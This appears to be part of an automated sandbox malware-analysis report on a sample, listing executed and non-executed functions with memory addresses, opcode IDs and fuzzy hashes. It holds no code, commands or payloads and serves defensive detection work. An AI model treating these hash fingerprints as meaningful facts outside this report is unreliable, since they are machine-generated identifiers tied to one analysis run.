                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:7.2%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:3
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 9628 7ffd9bb6c331 9630 7ffd9bb6c3a6 QueryFullProcessImageNameA 9628->9630 9631 7ffd9bb6c4f4 9630->9631

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B770D48 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5Z_H
                                                                                                                            • API String ID: 0-3267294416
                                                                                                                            • Opcode ID: 44310c142daff0ebc839a98c5d2fc55681db652030155e0db3bf66c285134bc2
                                                                                                                            • Instruction ID: 2f82e476d4881a15b4808f2ab2b41343940f3aef67488685ae7bb833eb92b61c
                                                                                                                            • Opcode Fuzzy Hash: 44310c142daff0ebc839a98c5d2fc55681db652030155e0db3bf66c285134bc2
                                                                                                                            • Instruction Fuzzy Hash: 7791E675A19B9D4FEB59EF6C88697A97FE1FF5A304F0001BAD049D72E2DAB81410C740
                                                                                                                            Function 00007FFD9BB6C331 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1701972602.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9bb60000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FullImageNameProcessQuery
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3578328331-0
                                                                                                                            • Opcode ID: 313e8412d37c2756e224ee913cfa1f256bab1e2b70d195ed250b82581d967fdc
                                                                                                                            • Instruction ID: d778a9b7bd88bf31a802891670098798ad995114b17a6c64fd2f431d3b0af36b
                                                                                                                            • Opcode Fuzzy Hash: 313e8412d37c2756e224ee913cfa1f256bab1e2b70d195ed250b82581d967fdc
                                                                                                                            • Instruction Fuzzy Hash: 44719130A08A8C8FDB68DF28D8557F937E1FF59315F10427EE84EC7292CA75A9458B81
                                                                                                                            Function 00007FFD9B8D5678 Relevance: .6, Instructions: 593COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1699200897.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b8d0000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2e486204d924a65fe5c1b3a3710ac63f7bf807d97090e335b8d7e96d6dc51b58
                                                                                                                            • Instruction ID: 6ee8becb480ac4cabb2c4ecca9ede6ceef7eaa477f6c57f8801f390c13a03232
                                                                                                                            • Opcode Fuzzy Hash: 2e486204d924a65fe5c1b3a3710ac63f7bf807d97090e335b8d7e96d6dc51b58
                                                                                                                            • Instruction Fuzzy Hash: 432267B1A1DA5D8FDF58EB18C8A5EA4B7E1FB68340F0442FAD44DD3292CE3579818B41
                                                                                                                            Function 00007FFD9B7708D0 Relevance: .2, Instructions: 163COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2b9bf624cc19ccb7345364ba3b1b8b6d4050261d7434fbe477ca958e47583f2d
                                                                                                                            • Instruction ID: b4568b69b883b576e74625aeead61cc15d79b5261d03236006a2ff5fcbe11f92
                                                                                                                            • Opcode Fuzzy Hash: 2b9bf624cc19ccb7345364ba3b1b8b6d4050261d7434fbe477ca958e47583f2d
                                                                                                                            • Instruction Fuzzy Hash: 91414826B4C6590EE714B7BC60B56FD7B91DF59325B0401FBE04EC71E7CE18A84186C0
                                                                                                                            Function 00007FFD9B770910 Relevance: .2, Instructions: 152COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 278743b47a1d727aeef6521eefe6b54d91a4c4c35664383176a0b526ed3b87a9
                                                                                                                            • Instruction ID: a307fcf60cf945aa4b62341d37a2a6c60e46f7ac994d29e6328b4c560e4a65d4
                                                                                                                            • Opcode Fuzzy Hash: 278743b47a1d727aeef6521eefe6b54d91a4c4c35664383176a0b526ed3b87a9
                                                                                                                            • Instruction Fuzzy Hash: FF412626B4CA590EE718B7BC60A96F87781DF59325B0445FBE04EC72E7CE18A8418684
                                                                                                                            Function 00007FFD9B770960 Relevance: .1, Instructions: 117COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 13e655fd0ccc9bba168a2259e15f59ea9bc1fafe8fb78732f1cfa421895886f9
                                                                                                                            • Instruction ID: 65845bbf663cebafd33820b10559566c5acfa5849e93afe2fb5d83efc616f3e0
                                                                                                                            • Opcode Fuzzy Hash: 13e655fd0ccc9bba168a2259e15f59ea9bc1fafe8fb78732f1cfa421895886f9
                                                                                                                            • Instruction Fuzzy Hash: 89310C26B1DA1D0FE758B66C64BAAF973C2DF58325B1141FAE40EC32E7DD18AC418684
                                                                                                                            Function 00007FFD9B77116D Relevance: .1, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 729538d96505dccc9ad6ce96aa8c957577ff8fb72c30203a4a9bbee4559cb47d
                                                                                                                            • Instruction ID: eb18111bee7e76686be008b66d8d48080e3b03790bc9dd02ae17a2bef1477d40
                                                                                                                            • Opcode Fuzzy Hash: 729538d96505dccc9ad6ce96aa8c957577ff8fb72c30203a4a9bbee4559cb47d
                                                                                                                            • Instruction Fuzzy Hash: 3E318730A1964D8FDB45EB68C8A5AA977F1FF69300F0502B6D409DB1B2DF78A941CB50
                                                                                                                            Function 00007FFD9B770998 Relevance: .1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3f9cb6ebedf8e218e4b1ec090e4c3a4e8c2e090a1aab61ec2f1a211f707fc7da
                                                                                                                            • Instruction ID: 9d81f78d0df2f5910c1227e3f76f87e5e95dafc2717c211c1a0de5a124653ed8
                                                                                                                            • Opcode Fuzzy Hash: 3f9cb6ebedf8e218e4b1ec090e4c3a4e8c2e090a1aab61ec2f1a211f707fc7da
                                                                                                                            • Instruction Fuzzy Hash: 2221D720B19A1D0FE798F66C94A96B972D2EB9D315B5101B9E80EC33F7DD68EC418281
                                                                                                                            Function 00007FFD9B770C25 Relevance: .1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 28f188e086338a06080d09af6b3f65d738b6c80709cb9a397bbf37e979d2b9f0
                                                                                                                            • Instruction ID: 2975ada1e1f6c54c3359bbf30bc1f58d345ba2193e935e826e06f3674e3176b6
                                                                                                                            • Opcode Fuzzy Hash: 28f188e086338a06080d09af6b3f65d738b6c80709cb9a397bbf37e979d2b9f0
                                                                                                                            • Instruction Fuzzy Hash: B721F936B0D75D8FEB22A7A89C650EC7B60EF42325F1542F7D148CB1E3D97826468781
                                                                                                                            Function 00007FFD9B776872 Relevance: .1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9b695ba0435381d8f1d16187348277d27b725767301b7fa9c2ae713750510416
                                                                                                                            • Instruction ID: b8c8f5a557c6b2d9107aa7494db73cb87f9e981bab8c4809f13719240de950d0
                                                                                                                            • Opcode Fuzzy Hash: 9b695ba0435381d8f1d16187348277d27b725767301b7fa9c2ae713750510416
                                                                                                                            • Instruction Fuzzy Hash: E0118A20F1D61D4FEBB4E65484B56B87290FF18700F5202F5D44EE72B6EE68AE444B40
                                                                                                                            Function 00007FFD9B770C38 Relevance: .1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2480add27b73a0a2834a669f56765fc76ff8b9597aa260e4e371971271751bb1
                                                                                                                            • Instruction ID: 9e31f33889cefd968c554faa60952fec8b5f0c056840761a5cd1482aff4604c8
                                                                                                                            • Opcode Fuzzy Hash: 2480add27b73a0a2834a669f56765fc76ff8b9597aa260e4e371971271751bb1
                                                                                                                            • Instruction Fuzzy Hash: 09117335B0E78D8FEB22DBA888A51EC7BB0EF52714F1646B7C044DB1F2D97416458781
                                                                                                                            Function 00007FFD9B770C48 Relevance: .0, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 06b3cfd7f68d6353ec0f6268bf5aa2eabfeb1f958c99ecadcfda830fcab7fd81
                                                                                                                            • Instruction ID: 18b09426ce0f6d3611c5f928277fdc605f025e55b796e3ee059a8759f9e3eb8f
                                                                                                                            • Opcode Fuzzy Hash: 06b3cfd7f68d6353ec0f6268bf5aa2eabfeb1f958c99ecadcfda830fcab7fd81
                                                                                                                            • Instruction Fuzzy Hash: 63018035A0E38D8FEB22DB6488A409C7FB0EF42704F1642E7C044DB1B2D9745A458781
                                                                                                                            Function 00007FFD9B7769C4 Relevance: .0, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                            • Instruction ID: 76d9a97b26d1c78a3df95da8f5d86b576d7c3e2dc1f3b25a0d19c3fdf1ebd174
                                                                                                                            • Opcode Fuzzy Hash: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                            • Instruction Fuzzy Hash: 42018630A0961E4EEB74E650D8A47F873A0FB54300F1102FAC44EE31B6EF687E918B41
                                                                                                                            Function 00007FFD9B770C50 Relevance: .0, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 419b3c77b606417eeddad43c5179d38457120d51ebbae714bb42f710f30557e4
                                                                                                                            • Instruction ID: c3b3881d58bdaed6639923588d9662b14198dbe221c6468a1f7c26fc4a4c7749
                                                                                                                            • Opcode Fuzzy Hash: 419b3c77b606417eeddad43c5179d38457120d51ebbae714bb42f710f30557e4
                                                                                                                            • Instruction Fuzzy Hash: D2017134A0E38D9FEB22DBA488A40AC7FB0EF02704F1542E7C044DB1A2D9785B448741
                                                                                                                            Function 00007FFD9B775E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 50821a60f0d3acda19bba03f045cd2cda0a39c053b9d8e8442bf55303f5772f5
                                                                                                                            • Instruction ID: 3990815a9ea3b999bf5cc40503f3a52a59767f7d87a7f66f16f9c8d0def333a7
                                                                                                                            • Opcode Fuzzy Hash: 50821a60f0d3acda19bba03f045cd2cda0a39c053b9d8e8442bf55303f5772f5
                                                                                                                            • Instruction Fuzzy Hash: 83F0C231648A0A8FCF54DF08C894FA973B1FB98311F1586A9D00ED7260DA74AA85DF81
                                                                                                                            Function 00007FFD9B7768B1 Relevance: .0, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                            • Instruction ID: 94c5a7c9840a28c21d1fdf49a104763f6547fff0a0a519f4a64a77ccd37a0286
                                                                                                                            • Opcode Fuzzy Hash: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                            • Instruction Fuzzy Hash: 14F09630B0960E4AEAB4E644D4A56F83391EF04300F1202F9D84EE31B7DE98BE954A81
                                                                                                                            Function 00007FFD9B77606A Relevance: .0, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0156a4adc8e068aa0815b9267cf01b431ce279f862c8b7d4892bdfbd2c35dda3
                                                                                                                            • Instruction ID: e5ae414e16b7ce5c6fe6782e2aae3f07deaa4af27eb8c3f07cfc5a0377fcc5f6
                                                                                                                            • Opcode Fuzzy Hash: 0156a4adc8e068aa0815b9267cf01b431ce279f862c8b7d4892bdfbd2c35dda3
                                                                                                                            • Instruction Fuzzy Hash: DBE08C01F1A60943EB68A9BC54A96B533D2DB98B00F220239E00EC32F6DDB8AE425240
                                                                                                                            Function 00007FFD9B771DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                            • Instruction ID: 6eef2b9101f286c0de708749734b3c87a9ab1d86c77e91a95aca8fc206b80839
                                                                                                                            • Opcode Fuzzy Hash: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                            • Instruction Fuzzy Hash: 6BE01274F0D51E87FB64E284C8A17F97265EB84700F150278D91ED33E1CD68AE418755
                                                                                                                            Function 00007FFD9B770D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction ID: af6b9e6b75b6f4d44527ea7727e4b1347e76f90f0f256e63133c3acbb990fd7b
                                                                                                                            • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction Fuzzy Hash: 8CE01234B0930ECBEB10DB94C4D86ED7761EB51711F104765C401872E9DAB86784CA80
                                                                                                                            Function 00007FFD9B770B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                            • Instruction ID: e238c8e489ea54dc92cb3785f0c3f5a1a696c644c8a57d88ccbaf80f6b5fc3cd
                                                                                                                            • Opcode Fuzzy Hash: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                            • Instruction Fuzzy Hash: ABC0123062990E8FDA40BB28C888824BBA0FB0E305BDA14E0E00CCB1B1D65999908701
                                                                                                                            Function 00007FFD9B7706A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                                                                                                            • Instruction ID: 9d3a9c9ff7dd266b0c551714c550585fde43bf897d0ec22268bd259c5ca2cc5d
                                                                                                                            • Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                                                                                                            • Instruction Fuzzy Hash: CBC01200F0B70E00E820B1AA14B20ADB140EBC4A10FD20232C009820F198CE22C50186
                                                                                                                            Function 00007FFD9B7712B0 Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                            • Instruction ID: 4a608c6e5b68d566e5d0aca419b93c07a0975fe2a19d3e81f88c1bd0e08eb570
                                                                                                                            • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                            • Instruction Fuzzy Hash: C9C08C3051180C8FC948EB28C88490433A0FB09200BC20090E008C7170D259DCD0CB80
                                                                                                                            Function 00007FFD9B774960 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1aed22d535b49b5cf5dec338b2c77a9b375ae4a11a866e095ff072f2059f76cd
                                                                                                                            • Instruction ID: 82a3ee7dca0345f38f154c311decff085a93fb8618686fcbb77611ab3b84e02d
                                                                                                                            • Opcode Fuzzy Hash: 1aed22d535b49b5cf5dec338b2c77a9b375ae4a11a866e095ff072f2059f76cd
                                                                                                                            • Instruction Fuzzy Hash: A6C01200F1891A06EA65A208046122D00029B44608F9002B4E41A833CECD1C1E0252CA
                                                                                                                            Function 00007FFD9B7706C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                            • Instruction ID: b727a47db897bbfaa5d7dd425fbade6246dca3182169efcff4491616c30f5392
                                                                                                                            • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                            • Instruction Fuzzy Hash: 8EB01200E5750F00E82431FA08E2065B080DB44100FC20270D40C411F198CD12D40682

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9BB6A680 Relevance: .6, Instructions: 585COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1701972602.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9bb60000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2da1dbc23195a1b7f146b41093a747a5b525bfcdf82fd14cbeb5425422089f60
                                                                                                                            • Instruction ID: dd78e10cf397f2f617144a7a9cc0df1e5f1b00c97280bcea70afa05ccb380418
                                                                                                                            • Opcode Fuzzy Hash: 2da1dbc23195a1b7f146b41093a747a5b525bfcdf82fd14cbeb5425422089f60
                                                                                                                            • Instruction Fuzzy Hash: C812A131B09A5D8FEBA8FBA884A97B876D1FF98318F15017AD00DC32E3DD286D418741
                                                                                                                            Function 00007FFD9B770E43 Relevance: .2, Instructions: 174COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 00c507435728abc35db520126337dc0c0304c448c0d30e2dd0967645cb030674
                                                                                                                            • Instruction ID: d757023759192aea11a6feb12b034e49ef340d8d822308730fc5679468d001c6
                                                                                                                            • Opcode Fuzzy Hash: 00c507435728abc35db520126337dc0c0304c448c0d30e2dd0967645cb030674
                                                                                                                            • Instruction Fuzzy Hash: 8851E675A19A5D8FEB98EF9C88A97A97BE1FB59314F4001BED00AD33E5CBB81450C740
                                                                                                                            Function 00007FFD9B7709B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695242427.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
